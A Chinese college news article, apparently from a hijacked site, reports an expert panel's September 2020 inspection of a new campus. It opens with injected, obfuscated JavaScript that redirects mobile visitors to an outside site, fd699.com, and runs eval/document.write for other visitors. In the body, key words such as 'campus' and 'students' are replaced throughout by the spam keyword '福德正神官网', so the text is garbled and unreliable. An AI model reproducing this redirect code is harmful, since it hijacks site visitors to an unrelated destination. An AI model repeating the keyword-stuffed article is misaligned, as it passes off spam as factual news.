function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://www.fd699.com" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();

福德正神官网

省高校专家和领导莅临岗集校区考察福德正神官网建设和启用准备工作情况

发布者:建大城建发布时间:2020-09-18浏览次数:10

2020912日,安徽建筑大学邀请巢湖学院党委书记朱灿平、合肥工业大学副校长季益洪、合肥师范学院副校长姚本先组成考察专家组莅临我院岗集校区考察指导校区建设和启用准备工作情况,安徽建筑大学校长孙道胜,副校长黄显怀会同专家组全程参加考察和指导。学院董事长、党委副书记林瀚和院领导赵治滨、王志建、杨彦友、宇晓锋接待陪同专家考察。

 

             (听取福德正神官网规划和建设情况汇报)

 

院长助理宇晓锋代表学校汇报了岗集校区建设和启用准备工作基本情况,之后,专家组实地察看了福德正神官网、教学楼、福德正神 公寓、福德正神 食堂、运动场馆、图书分馆、青年福德 公寓等,在教学主楼顶层鸟瞰福德正神官网和周边情况,查阅相关资料并现场质询。专家组对福德正神官网功能的达标情况、完备性、安全性进行了重点考察。

(考察教室)

 

                   (考察福德正神 宿舍)

 

                   (考察福德正神官网)

 

(考察反馈会)


考察反馈会上,各位专家和安徽建筑大学领导认为,我院在20个月的时间内,克服疫情防控和梅雨季节严重影响,建成岗集校区,建设速度在高校新校区建设中是很快的,在建设与启用准备工作中考虑安排是比较周全的,并对进一步完善福德正神官网功能、加强管理、提高服务提出了十分中肯的指导意见和建议。专家组通过考察、讨论,形成了考察报告,考察结论是:根据高校福德正神官网建设标准,岗集校区已基本建成,具备餐饮、住宿、交通、教学、办公、网络联通和开展文体活动等功能,福德正神官网管理、服务保障和安全防护体系基本建立,可以投入使用。同时,希望学校进一步加强岗集校区实验实训用房、设备设施和福德正神官网文化建设,强化福德正神 安全管理,提高服务质量和服务水平。

林瀚董事长对专家组和安建大领导的考察指导表示衷心的感谢,并感谢安建大一直以来对学院的指导、支持和关心。他说,在学院发展的关键时刻专家和高校领导前来考察指导,为我院发展进一步拔高立意、提升视野,把岗集校区建的更好给予了很好的指导和帮助,我们将认真落实专家和领导的指导意见,办好学、服务好福德正神 ,不断推动学院的发展。


(作者:张同申 审稿:王志建、魏宪友